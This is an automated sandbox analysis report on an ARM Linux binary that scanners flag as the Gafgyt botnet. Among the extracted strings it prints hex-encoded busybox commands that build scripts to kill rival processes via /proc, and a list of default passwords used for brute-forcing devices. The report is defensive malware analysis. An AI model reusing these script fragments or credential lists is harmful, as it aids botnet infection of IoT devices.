Linux Analysis Report
arm5.elf

Overview

General Information

Sample name:arm5.elf
Analysis ID:1654459
MD5:86e67690c30c8967d803e0f609259b54
SHA1:566448bd1e208b19526d19b4a547c4311a92b866
SHA256:3db8ba259d2aea79d95aaa9ddb8f5d5fb45e7122b98ab150992506a64daecb6c
Tags:elf, user-abuse_ch
Infos:

Detection

Score:48
Range:0 - 100

Signatures

Multi AV Scanner detection for submitted file
Enumerates processes within the "proc" file system
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample contains strings indicative of password brute-forcing capabilities
Sample has stripped symbol table
Sample listens on a socket
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

Classification chart (categories: Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner; verdict scale: clean, suspicious, malicious)
Joe Sandbox version:42.0.0 Malachite
Analysis ID:1654459
Start date and time:2025-04-02 11:20:14 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 32s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:arm5.elf
Detection:MAL
Classification:mal48.linELF@0/4@2/0
Command:/tmp/arm5.elf
PID:5532
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
For God so loved the world
Standard Error:
Process tree:
  • system is lnxubuntu20
  • arm5.elf (PID: 5532, Parent: 5452, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/arm5.elf
    • arm5.elf New Fork (PID: 5536, Parent: 5532)
  • cleanup
No yara matches
No Suricata rule has matched


AV Detection

Source: arm5.elf | ReversingLabs: Detection: 41%
Source: arm5.elf | Virustotal: Detection: 42%
Source: /tmp/arm5.elf (PID: 5536) | Socket: 127.0.0.1:22448
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: daisy.ubuntu.com
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x77\x68\x69\x6c\x65\x20\x72\x65\x61\x64\x20\x2d\x72\x20\x6c\x3b\x20\x64\x6f\x20\x6d\x70\x3d\x24\x28\x65\x63\x68\x6f\x20\x22\x24" > kmount
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x6c\x22\x20\x7c\x20\x61\x77\x6b\x20\x27\x7b\x70\x72\x69\x6e\x74\x20\x24\x32\x7d\x27\x20\x7c\x20\x73\x65\x64\x20\x27\x73\x2f\x5c" >> kmount
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x5c\x30\x34\x30\x2f\x20\x2f\x67\x27\x29\x3b\x20\x63\x61\x73\x65\x20\x22\x24\x6d\x70\x22\x20\x69\x6e\x20\x2f\x70\x72\x6f\x63\x2f" >> kmount
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x5b\x30\x2d\x39\x5d\x2a\x29\x20\x70\x69\x64\x3d\x24\x7b\x6d\x70\x23\x2f\x70\x72\x6f\x63\x2f\x7d\x3b\x20\x5b\x20\x2d\x64\x20\x22" >> kmount
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x2f\x70\x72\x6f\x63\x2f\x24\x70\x69\x64\x22\x20\x5d\x20\x26\x26\x20\x6b\x69\x6c\x6c\x20\x2d\x39\x20\x22\x24\x70\x69\x64\x22\x20" >> kmount
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x32\x3e\x2f\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x20\x26\x26\x20\x75\x6d\x6f\x75\x6e\x74\x20\x22\x24\x6d\x70\x22\x20\x32\x3e\x2f\x64" >> kmount
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x65\x76\x2f\x6e\x75\x6c\x6c\x3b\x3b\x20\x65\x73\x61\x63\x3b\x20\x64\x6f\x6e\x65\x20\x3c\x20\x2f\x70\x72\x6f\x63\x2f\x6d\x6f\x75" >> kmount
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x6e\x74\x73" >> kmount
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x66\x6f\x72\x20\x70\x69\x64\x20\x69\x6e\x20\x2f\x70\x72\x6f\x63\x2f\x5b\x30\x2d\x39\x5d\x2a\x3b\x20\x64\x6f\x20\x70\x69\x64\x5f" > swan
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x6e\x75\x6d\x3d\x22\x24\x7b\x70\x69\x64\x23\x23\x2a\x2f\x7d\x22\x3b\x20\x69\x66\x20\x5b\x20\x2d\x72\x20\x22\x24\x70\x69\x64\x2f" >> swan
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x6d\x61\x70\x73\x22\x20\x5d\x3b\x20\x74\x68\x65\x6e\x20\x73\x75\x73\x70\x69\x63\x69\x6f\x75\x73\x3d\x74\x72\x75\x65\x3b\x20\x77" >> swan
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x68\x69\x6c\x65\x20\x49\x46\x53\x3d\x20\x72\x65\x61\x64\x20\x2d\x72\x20\x6c\x69\x6e\x65\x3b\x20\x64\x6f\x20\x63\x61\x73\x65\x20" >> swan
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x22\x24\x6c\x69\x6e\x65\x22\x20\x69\x6e\x20\x2a\x22\x2f\x6c\x69\x62\x2f\x22\x2a\x7c\x2a\x22\x2f\x6c\x69\x62\x36\x34\x2f\x22\x2a" >> swan
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x7c\x2a\x22\x2e\x73\x6f\x22\x2a\x29\x20\x73\x75\x73\x70\x69\x63\x69\x6f\x75\x73\x3d\x66\x61\x6c\x73\x65\x3b\x20\x62\x72\x65\x61" >> swan
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x6b\x3b\x3b\x20\x65\x73\x61\x63\x3b\x20\x64\x6f\x6e\x65\x20\x3c\x20\x22\x24\x70\x69\x64\x2f\x6d\x61\x70\x73\x22\x3b\x20\x69\x66" >> swan
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x20\x5b\x20\x22\x24\x73\x75\x73\x70\x69\x63\x69\x6f\x75\x73\x22\x20\x3d\x20\x74\x72\x75\x65\x20\x5d\x3b\x20\x74\x68\x65\x6e\x20" >> swan
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x6b\x69\x6c\x6c\x20\x2d\x39\x20\x22\x24\x70\x69\x64\x5f\x6e\x75\x6d\x22\x3b\x20\x66\x69\x3b\x20\x66\x69\x3b\x20\x64\x6f\x6e\x65" >> swan
Source: Initial sampleString containing 'busybox' found: sh kmount/bin/busybox echo -ne "\x66\x6f\x72\x20\x70\x69\x64\x20\x69\x6e\x20\x2f\x70\x72\x6f\x63\x2f\x5b\x30\x2d\x39\x5d\x2a\x3b\x20\x64\x6f\x20\x70\x69\x64\x5f" > swan
Source: Initial sample | String containing potential weak password found: 12345
Source: Initial sample | String containing potential weak password found: 54321
Source: Initial sample | String containing potential weak password found: 654321
Source: Initial sample | String containing potential weak password found: admin1234
Source: Initial sample | String containing potential weak password found: administrator
Source: Initial sample | String containing potential weak password found: supervisor
Source: Initial sample | String containing potential weak password found: password
Source: Initial sample | String containing potential weak password found: default
Source: Initial sample | String containing potential weak password found: guest
Source: Initial sample | String containing potential weak password found: service
Source: Initial sample | String containing potential weak password found: support
Source: ELF static info symbol of initial sample | .symtab present: no
Source: classification engine | Classification label: mal48.linELF@0/4@2/0
Source: /tmp/arm5.elf (PID: 5532) | File opened: /proc/110/cmdline
Source: /tmp/arm5.elf (PID: 5532) | File opened: /proc/231/cmdline
Source: /tmp/arm5.elf (PID: 5532) | File opened: /proc/111/cmdline
Source: /tmp/arm5.elf (PID: 5532) | File opened: /proc/112/cmdline
Source: /tmp/arm5.elf (PID: 5532) | File opened: /proc/233/cmdline
Source: /tmp/arm5.elf (PID: 5532) | File opened: /proc/113/cmdline
Source: /tmp/arm5.elf (PID: 5532) | File opened: /proc/114/cmdline
Source: /tmp/arm5.elf (PID: 5532) | File opened: /proc/235/cmdline
Source: /tmp/arm5.elf (PID: 5532) | File opened: /proc/115/cmdline
Source: /tmp/arm5.elf (PID: 5532) | File opened: /proc/1333/cmdline
Source: /tmp/arm5.elf (PID: 5532) | File opened: /proc/1333/fd
Source: /tmp/arm5.elf (PID: 5532) | File opened: /proc/1333/cmdline
Source: /tmp/arm5.elf (PID: 5532) | File opened: /proc/116/cmdline
Source: /tmp/arm5.elf (PID: 5532) | File opened: /proc/1695/cmdline
Source: /tmp/arm5.elf (PID: 5532) | File opened: /proc/1695/fd
Source: /tmp/arm5.elf (PID: 5532) | File opened: /proc/1695/cmdline
Source: /tmp/arm5.elf (PID: 5532) | File opened: /proc/117/cmdline
Source: /tmp/arm5.elf (PID: 5532) | File opened: /proc/118/cmdline
Source: /tmp/arm5.elf (PID: 5532) | File opened: /proc/119/cmdline
Source: /tmp/arm5.elf (PID: 5532) | File opened: /proc/911/cmdline
Source: /tmp/arm5.elf (PID: 5532) | File opened: /proc/914/cmdline
Source: /tmp/arm5.elf (PID: 5532) | File opened: /proc/3876/cmdline
Source: /tmp/arm5.elf (PID: 5532) | File opened: /proc/3876/fd
Source: /tmp/arm5.elf (PID: 5532) | File opened: /proc/3876/cmdline
Source: /tmp/arm5.elf (PID: 5532) | File opened: /proc/10/cmdline
Source: /tmp/arm5.elf (PID: 5532) | File opened: /proc/917/cmdline
Source: /tmp/arm5.elf (PID: 5532) | File opened: /proc/917/fd
Source: /tmp/arm5.elf (PID: 5532) | File opened: /proc/917/cmdline
Source: /tmp/arm5.elf (PID: 5532) | File opened: /proc/11/cmdline
Source: /tmp/arm5.elf (PID: 5532) | File opened: /proc/12/cmdline
Source: /tmp/arm5.elf (PID: 5532) | File opened: /proc/13/cmdline
Source: /tmp/arm5.elf (PID: 5532) | File opened: /proc/14/cmdline
Source: /tmp/arm5.elf (PID: 5532) | File opened: /proc/15/cmdline
Source: /tmp/arm5.elf (PID: 5532) | File opened: /proc/16/cmdline
Source: /tmp/arm5.elf (PID: 5532) | File opened: /proc/17/cmdline
Source: /tmp/arm5.elf (PID: 5532) | File opened: /proc/18/cmdline
Source: /tmp/arm5.elf (PID: 5532) | File opened: /proc/19/cmdline
Source: /tmp/arm5.elf (PID: 5532) | File opened: /proc/1591/cmdline
Source: /tmp/arm5.elf (PID: 5532) | File opened: /proc/1591/fd
Source: /tmp/arm5.elf (PID: 5532) | File opened: /proc/1591/cmdline
Source: /tmp/arm5.elf (PID: 5532) | File opened: /proc/120/cmdline
Source: /tmp/arm5.elf (PID: 5532) | File opened: /proc/121/cmdline
Source: /tmp/arm5.elf (PID: 5532) | File opened: /proc/1/maps
Source: /tmp/arm5.elf (PID: 5532) | File opened: /proc/1/cmdline
Source: /tmp/arm5.elf (PID: 5532) | File opened: /proc/1/fd
Source: /tmp/arm5.elf (PID: 5532) | File opened: /proc/1/cmdline
Source: /tmp/arm5.elf (PID: 5532) | File opened: /proc/122/cmdline
Source: /tmp/arm5.elf (PID: 5532) | File opened: /proc/243/cmdline
Source: /tmp/arm5.elf (PID: 5532) | File opened: /proc/2/cmdline
Source: /tmp/arm5.elf (PID: 5532) | File opened: /proc/123/cmdline
Source: /tmp/arm5.elf (PID: 5532) | File opened: /proc/3/cmdline
Source: /tmp/arm5.elf (PID: 5532) | File opened: /proc/124/cmdline
Source: /tmp/arm5.elf (PID: 5532) | File opened: /proc/1588/cmdline
Source: /tmp/arm5.elf (PID: 5532) | File opened: /proc/1588/fd
Source: /tmp/arm5.elf (PID: 5532) | File opened: /proc/1588/cmdline
Source: /tmp/arm5.elf (PID: 5532) | File opened: /proc/125/cmdline
Source: /tmp/arm5.elf (PID: 5532) | File opened: /proc/4/cmdline
Source: /tmp/arm5.elf (PID: 5532) | File opened: /proc/246/cmdline
Source: /tmp/arm5.elf (PID: 5532) | File opened: /proc/126/cmdline
Source: /tmp/arm5.elf (PID: 5532) | File opened: /proc/5/cmdline
Source: /tmp/arm5.elf (PID: 5532) | File opened: /proc/127/cmdline
Source: /tmp/arm5.elf (PID: 5532) | File opened: /proc/6/cmdline
Source: /tmp/arm5.elf (PID: 5532) | File opened: /proc/1585/cmdline
Source: /tmp/arm5.elf (PID: 5532) | File opened: /proc/1585/fd
Source: /tmp/arm5.elf (PID: 5532) | File opened: /proc/1585/cmdline
Source: /tmp/arm5.elf (PID: 5532) | File opened: /proc/128/cmdline
Source: /tmp/arm5.elf (PID: 5532) | File opened: /proc/7/cmdline
Source: /tmp/arm5.elf (PID: 5532) | File opened: /proc/129/cmdline
Source: /tmp/arm5.elf (PID: 5532) | File opened: /proc/8/cmdline
Source: /tmp/arm5.elf (PID: 5532) | File opened: /proc/800/cmdline
Source: /tmp/arm5.elf (PID: 5532) | File opened: /proc/800/fd
Source: /tmp/arm5.elf (PID: 5532) | File opened: /proc/800/cmdline
Source: /tmp/arm5.elf (PID: 5532) | File opened: /proc/9/cmdline
Source: /tmp/arm5.elf (PID: 5532) | File opened: /proc/802/cmdline
Source: /tmp/arm5.elf (PID: 5532) | File opened: /proc/802/fd
Source: /tmp/arm5.elf (PID: 5532) | File opened: /proc/802/cmdline
Source: /tmp/arm5.elf (PID: 5532) | File opened: /proc/803/cmdline
Source: /tmp/arm5.elf (PID: 5532) | File opened: /proc/803/fd
Source: /tmp/arm5.elf (PID: 5532) | File opened: /proc/803/cmdline
Source: /tmp/arm5.elf (PID: 5532) | File opened: /proc/804/cmdline
Source: /tmp/arm5.elf (PID: 5532) | File opened: /proc/804/fd
Source: /tmp/arm5.elf (PID: 5532) | File opened: /proc/804/cmdline
Source: /tmp/arm5.elf (PID: 5532) | File opened: /proc/20/cmdline
Source: /tmp/arm5.elf (PID: 5532) | File opened: /proc/21/cmdline
Source: /tmp/arm5.elf (PID: 5532) | File opened: /proc/3407/cmdline
Source: /tmp/arm5.elf (PID: 5532) | File opened: /proc/3407/fd
Source: /tmp/arm5.elf (PID: 5532) | File opened: /proc/3407/cmdline
Source: /tmp/arm5.elf (PID: 5532) | File opened: /proc/22/cmdline
Source: /tmp/arm5.elf (PID: 5532) | File opened: /proc/23/cmdline
Source: /tmp/arm5.elf (PID: 5532) | File opened: /proc/24/cmdline
Source: /tmp/arm5.elf (PID: 5532) | File opened: /proc/25/cmdline
Source: /tmp/arm5.elf (PID: 5532) | File opened: /proc/26/cmdline
Source: /tmp/arm5.elf (PID: 5532) | File opened: /proc/27/cmdline
Source: /tmp/arm5.elf (PID: 5532) | File opened: /proc/28/cmdline
Source: /tmp/arm5.elf (PID: 5532) | File opened: /proc/29/cmdline
Source: /tmp/arm5.elf (PID: 5532) | File opened: /proc/1484/cmdline
Source: /tmp/arm5.elf (PID: 5532) | File opened: /proc/1484/fd
Source: /tmp/arm5.elf (PID: 5532) | File opened: /proc/1484/maps
Source: /tmp/arm5.elf (PID: 5532) | File opened: /proc/1484/cmdline
Source: /tmp/arm5.elf (PID: 5532) | File opened: /proc/490/cmdline
Source: /tmp/arm5.elf (PID: 5532) | File opened: /proc/490/fd
Source: /tmp/arm5.elf (PID: 5532) | File opened: /proc/490/cmdline
Source: /tmp/arm5.elf (PID: 5532) | File opened: /proc/250/cmdline
Source: /tmp/arm5.elf (PID: 5532) | File opened: /proc/130/cmdline
Source: /tmp/arm5.elf (PID: 5532) | File opened: /proc/251/cmdline
Source: /tmp/arm5.elf (PID: 5532) | Queries kernel information via 'uname'
Source: arm5.elf, 5532.1.00007ffcbff1a000.00007ffcbff3b000.rw-.sdmp | Binary or memory string: /tmp/qemu-open.WoMnMv
Source: arm5.elf, 5532.1.00007ffcbff1a000.00007ffcbff3b000.rw-.sdmp, arm5.elf, 5536.1.00007ffcbff1a000.00007ffcbff3b000.rw-.sdmp | Binary or memory string: x86_64/usr/bin/qemu-arm/tmp/arm5.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/arm5.elf
Source: arm5.elf, 5536.1.00007f9a3003a000.00007f9a30041000.rw-.sdmp | Binary or memory string: vmware
Source: arm5.elf, 5532.1.000055fae2210000.000055fae235f000.rw-.sdmp, arm5.elf, 5536.1.000055fae2210000.000055fae235f000.rw-.sdmp | Binary or memory string: U!/etc/qemu-binfmt/arm
Source: arm5.elf, 5532.1.00007f9a3003a000.00007f9a30041000.rw-.sdmp, arm5.elf, 5536.1.00007f9a3003a000.00007f9a30041000.rw-.sdmp | Binary or memory string: qemu-arm
Source: arm5.elf, 5536.1.00007ffcbff1a000.00007ffcbff3b000.rw-.sdmp | Binary or memory string: Uqemu: uncaught target signal 11 (Segmentation fault) - core dumped
Source: arm5.elf, 5532.1.000055fae2210000.000055fae235f000.rw-.sdmp, arm5.elf, 5536.1.000055fae2210000.000055fae235f000.rw-.sdmp | Binary or memory string: /etc/qemu-binfmt/arm
Source: arm5.elf, 5532.1.00007ffcbff1a000.00007ffcbff3b000.rw-.sdmp, arm5.elf, 5536.1.00007ffcbff1a000.00007ffcbff3b000.rw-.sdmp | Binary or memory string: /usr/bin/qemu-arm
Source: arm5.elf, 5536.1.00007ffcbff1a000.00007ffcbff3b000.rw-.sdmp | Binary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped
Source: arm5.elf, 5532.1.00007ffcbff1a000.00007ffcbff3b000.rw-.sdmp | Binary or memory string: U/tmp/qemu-open.WoMnMv:
Source: arm5.elf, 5532.1.00007f9a3003a000.00007f9a30041000.rw-.sdmp, arm5.elf, 5536.1.00007f9a3003a000.00007f9a30041000.rw-.sdmp | Binary or memory string: !!a1gAWFxuAXsFWUgBRQAA!!a1gAWFxuAXsAWUgKRXgA!!a1gAWFxuAXsAWEgJR3IA!!a10CWFxuAHsGWVcWQHAA!!a10CWFxuAHsGWVcWQHUA!!aFwAWF9uA3sGW0gLRgAA!!aFwAWFlpG2QBW0gJTwAA!!qemu-arm2QBW0gJTwAA!
MITRE ATT&CK matrix (a number before a technique is the count of matching signatures; the other entries are the matrix's default placeholders):
  • Reconnaissance: Gather Victim Identity Information; Credentials
  • Resource Development: Acquire Infrastructure; Domains
  • Initial Access: Valid Accounts; Default Accounts
  • Execution: Windows Management Instrumentation; Scheduled Task/Job
  • Persistence: Path Interception; Boot or Logon Initialization Scripts
  • Privilege Escalation: Path Interception; Boot or Logon Initialization Scripts
  • Defense Evasion: Direct Volume Access; Rootkit
  • Credential Access: 1 OS Credential Dumping; 1 Brute Force
  • Discovery: 11 Security Software Discovery; Application Window Discovery
  • Lateral Movement: Remote Services; Remote Desktop Protocol
  • Collection: Data from Local System; Data from Removable Media
  • Command and Control: 1 Non-Application Layer Protocol; 1 Application Layer Protocol
  • Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth
  • Impact: Abuse Accessibility Features; Network Denial of Service
No configs have been found
Behavior Graph (ID: 1654459, Sample: arm5.elf, Start date: 02/04/2025, Architecture: LINUX, Score: 48)
  • Process: arm5.elf started
    • Process: arm5.elf started (forked child)
  • DNS/IP Info: daisy.ubuntu.com
  • Signature: Multi AV Scanner detection for submitted file

Source | Detection | Scanner | Label
arm5.elf | 42% | ReversingLabs | Linux.Backdoor.Gafgyt
arm5.elf | 42% | Virustotal |
No Antivirus matches


Name | IP | Active | Malicious | Antivirus Detection | Reputation
daisy.ubuntu.com | 162.213.35.24 | true | false | | high
    No contacted IP infos
    No context
    Context for daisy.ubuntu.com, other samples that contacted the same domain (Associated Sample Name, Threat Name, resolved IP):
    • efea6.elf (Unknown): 162.213.35.25
    • xd.powerpc-440fp.elf (Mirai): 162.213.35.24
    • xd.m68k.elf (Mirai): 162.213.35.25
    • xd.ppc.elf (Mirai): 162.213.35.25
    • xd.i686.elf (Mirai): 162.213.35.24
    • xd.arm6.elf (Mirai): 162.213.35.24
    • xd.arc.elf (Mirai): 162.213.35.24
    • mpsl.elf (Unknown): 162.213.35.24
    • sh4.elf (Unknown): 162.213.35.24
    • s-h.4-.Sakura.elf (Gafgyt, Mirai): 162.213.35.24
    No context
    Process:/tmp/arm5.elf
    File Type:data
    Category:dropped
    Size (bytes):14
    Entropy (8bit):3.521640636343319
    Encrypted:false
    SSDEEP:3:TggLAJ5:Tgg03
    MD5:A737667E3E61E716C83359F35BC141DA
    SHA1:E7C3DBC96B90E28F18CFB1CADE0C7AF673FFAA57
    SHA-256:2D8A0F430A3339E16B223D653251534539D95B1DF7142834F68D9172B1656E37
    SHA-512:0ACAFC3F3F40EDEF3D9F2F1CCE09BAF5004FD8488434F4903F18B9B7E77B4A6CDF7F84A47856CB2FDAA4B1B0F70FC2A3EDDE82BD29831FF54CB75F4E4C74FE74
    Malicious:false
    Reputation:moderate, very likely benign file
    Preview:/tmp/arm5.elf.
    Process:/tmp/arm5.elf
    File Type:data
    Category:dropped
    Size (bytes):14
    Entropy (8bit):3.521640636343319
    Encrypted:false
    SSDEEP:3:TggLAJ5:Tgg03
    MD5:A737667E3E61E716C83359F35BC141DA
    SHA1:E7C3DBC96B90E28F18CFB1CADE0C7AF673FFAA57
    SHA-256:2D8A0F430A3339E16B223D653251534539D95B1DF7142834F68D9172B1656E37
    SHA-512:0ACAFC3F3F40EDEF3D9F2F1CCE09BAF5004FD8488434F4903F18B9B7E77B4A6CDF7F84A47856CB2FDAA4B1B0F70FC2A3EDDE82BD29831FF54CB75F4E4C74FE74
    Malicious:false
    Reputation:moderate, very likely benign file
    Preview:/tmp/arm5.elf.
    Process:/tmp/arm5.elf
    File Type:data
    Category:dropped
    Size (bytes):14
    Entropy (8bit):3.521640636343319
    Encrypted:false
    SSDEEP:3:TggLAJ5:Tgg03
    MD5:A737667E3E61E716C83359F35BC141DA
    SHA1:E7C3DBC96B90E28F18CFB1CADE0C7AF673FFAA57
    SHA-256:2D8A0F430A3339E16B223D653251534539D95B1DF7142834F68D9172B1656E37
    SHA-512:0ACAFC3F3F40EDEF3D9F2F1CCE09BAF5004FD8488434F4903F18B9B7E77B4A6CDF7F84A47856CB2FDAA4B1B0F70FC2A3EDDE82BD29831FF54CB75F4E4C74FE74
    Malicious:false
    Reputation:moderate, very likely benign file
    Preview:/tmp/arm5.elf.
    Process:/tmp/arm5.elf
    File Type:ASCII text
    Category:dropped
    Size (bytes):355
    Entropy (8bit):3.818462439917049
    Encrypted:false
    SSDEEP:6:M6gDFz0H/VU8VbsDFz0NNVFT/V/3VVyAb/rVmsVot/VOArB/VH:3YB02EbEB0TvVVIAbyl
    MD5:108AABC01874821C9209A280F1CAA40B
    SHA1:1927FB56D02AB5DBAEF3D09021176BC13BDF798F
    SHA-256:F51D934C20EE51DBA123B78ECDB54EF63DA8D3F03A15B6AB17EBFD42C5BD6F1D
    SHA-512:B168F18E38AD72F8B8B5A07DF3CB56ABE406EC07865EFDBAAD0EFB60C5D092CB6B046692248918223AB47E620D7EDAF06B902EEEB302C1C2AF83A7F7F9874A7F
    Malicious:false
    Reputation:low
    Preview:8000-22000 r-xp 00000000 fd:00 531606 /tmp/arm5.elf.2a000-2b000 rw-p 0001a000 fd:00 531606 /tmp/arm5.elf.2b000-32000 rw-p 00000000 00:00 0 .ff7ee000-ff7ef000 r--p 00000000 fd:00 793309 /usr/lib/x86_64-linux-gnu/libm-2.31.so.ff7ef000-ff7f0000 ---p 00000000 00:00 0 .ff7f0000-ffff0000 rw-p 00000000 00:00 0 [stack].
    File type:ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), dynamically linked, stripped
    Entropy (8bit):6.150599367260582
    TrID:
    • ELF Executable and Linkable format (generic) (4004/1) 100.00%
    File name:arm5.elf
    File size:107'272 bytes
    MD5:86e67690c30c8967d803e0f609259b54
    SHA1:566448bd1e208b19526d19b4a547c4311a92b866
    SHA256:3db8ba259d2aea79d95aaa9ddb8f5d5fb45e7122b98ab150992506a64daecb6c
    SHA512:56b279fda6f57bbaf35cf36f6067287dbb47fc96048efbe0d7612a1ff47f10a7f21b02b3ea6ed517280689a7938b8d420f86ecf4af1bfb20dde7ab6b8d347df8
    SSDEEP:3072:/wyIxMYZtAjVXtzULUYnN8tZdSzcrrFmulElrrhCadM:/wyIxMYZtY9HYKo+Fm0ElPh2
    TLSH:A4A30999B8919B66C5D406BFFE1F528D33231BF8E2DB3107DD14AB2077CA51A092F541
    File Content Preview:.ELF..............(.....l...4...(.......4. ...(.........T...T...T.......................................................................TH...........................................@-..@............/..@-.,@...0....S..... 0....S.........../..0...0...@..../

    ELF header

    Class:ELF32
    Data:2's complement, little endian
    Version:1 (current)
    Machine:ARM
    Version Number:0x1
    Type:EXEC (Executable file)
    OS/ABI:UNIX - System V
    ABI Version:0
    Entry Point Address:0x816c
    Flags:0x4000002
    ELF Header Size:52
    Program Header Offset:52
    Program Header Size:32
    Number of Program Headers:4
    Section Header Offset:106792
    Section Header Size:40
    Number of Section Headers:12
    Header String Table Index:11
    Section headers:
    Name | Type | Address | Offset | Size | EntSize | Flags | Flags Description | Link | Info | Align
    | NULL | 0x0 | 0x0 | 0x0 | 0x0 | 0x0 | | 0 | 0 | 0
    .init | PROGBITS | 0x80b4 | 0xb4 | 0x14 | 0x0 | 0x6 | AX | 0 | 0 | 1
    .text | PROGBITS | 0x80c8 | 0xc8 | 0x16fdc | 0x0 | 0x6 | AX | 0 | 0 | 4
    .fini | PROGBITS | 0x1f0a4 | 0x170a4 | 0x14 | 0x0 | 0x6 | AX | 0 | 0 | 1
    .rodata | PROGBITS | 0x1f0b8 | 0x170b8 | 0x289c | 0x0 | 0x2 | A | 0 | 0 | 4
    .ARM.exidx | ARM_EXIDX | 0x21954 | 0x19954 | 0xc8 | 0x0 | 0x82 | AL | 2 | 0 | 4
    .init_array | INIT_ARRAY | 0x2a004 | 0x1a004 | 0x4 | 0x0 | 0x3 | WA | 0 | 0 | 4
    .fini_array | FINI_ARRAY | 0x2a008 | 0x1a008 | 0x4 | 0x0 | 0x3 | WA | 0 | 0 | 4
    .got | PROGBITS | 0x2a010 | 0x1a010 | 0x28 | 0x4 | 0x3 | WA | 0 | 0 | 4
    .data | PROGBITS | 0x2a038 | 0x1a038 | 0x98 | 0x0 | 0x3 | WA | 0 | 0 | 4
    .bss | NOBITS | 0x2a0d0 | 0x1a0d0 | 0x4788 | 0x0 | 0x3 | WA | 0 | 0 | 8
    .shstrtab | STRTAB | 0x0 | 0x1a0d0 | 0x58 | 0x0 | 0x0 | | 0 | 0 | 1

    Program headers:
    Type | Offset | Virtual Address | Physical Address | File Size | Memory Size | Entropy | Flags | Flags Description | Align | Prog Interpreter | Section Mappings
    DYNAMIC | 0x19954 | 0x21954 | 0x21954 | 0xc8 | 0xc8 | 4.3297 | 0x4 | R | 0x4 | | .ARM.exidx
    LOAD | 0x0 | 0x8000 | 0x8000 | 0x19a1c | 0x19a1c | 6.2106 | 0x5 | R E | 0x8000 | | .init .text .fini .rodata .ARM.exidx
    LOAD | 0x1a004 | 0x2a004 | 0x2a004 | 0xcc | 0x4854 | 3.6364 | 0x6 | RW | 0x8000 | | .init_array .fini_array .got .data .bss
    DYNAMIC | 0x0 | 0x0 | 0x0 | 0x0 | 0x0 | 0.0000 | 0x7 | RWE | 0x4 | |


    UDP packets:
    Timestamp | Source Port | Dest Port | Source IP | Dest IP
    Apr 2, 2025 11:21:02.644490957 CEST | 44081 | 53 | 192.168.2.15 | 1.1.1.1
    Apr 2, 2025 11:21:02.644490957 CEST | 35166 | 53 | 192.168.2.15 | 1.1.1.1
    Apr 2, 2025 11:21:02.749730110 CEST | 53 | 44081 | 1.1.1.1 | 192.168.2.15
    Apr 2, 2025 11:21:02.750065088 CEST | 53 | 35166 | 1.1.1.1 | 192.168.2.15

    DNS queries:
    Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
    Apr 2, 2025 11:21:02.644490957 CEST | 192.168.2.15 | 1.1.1.1 | 0x7529 | Standard query (0) | daisy.ubuntu.com | A (IP address) | IN (0x0001) | false
    Apr 2, 2025 11:21:02.644490957 CEST | 192.168.2.15 | 1.1.1.1 | 0x2495 | Standard query (0) | daisy.ubuntu.com | 28 | IN (0x0001) | false

    DNS answers:
    Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
    Apr 2, 2025 11:21:02.749730110 CEST | 1.1.1.1 | 192.168.2.15 | 0x7529 | No error (0) | daisy.ubuntu.com | | 162.213.35.24 | A (IP address) | IN (0x0001) | false
    Apr 2, 2025 11:21:02.749730110 CEST | 1.1.1.1 | 192.168.2.15 | 0x7529 | No error (0) | daisy.ubuntu.com | | 162.213.35.25 | A (IP address) | IN (0x0001) | false

    System Behavior

    Start time (UTC):09:21:00
    Start date (UTC):02/04/2025
    Path:/tmp/arm5.elf
    Arguments:-
    File size:4956856 bytes
    MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1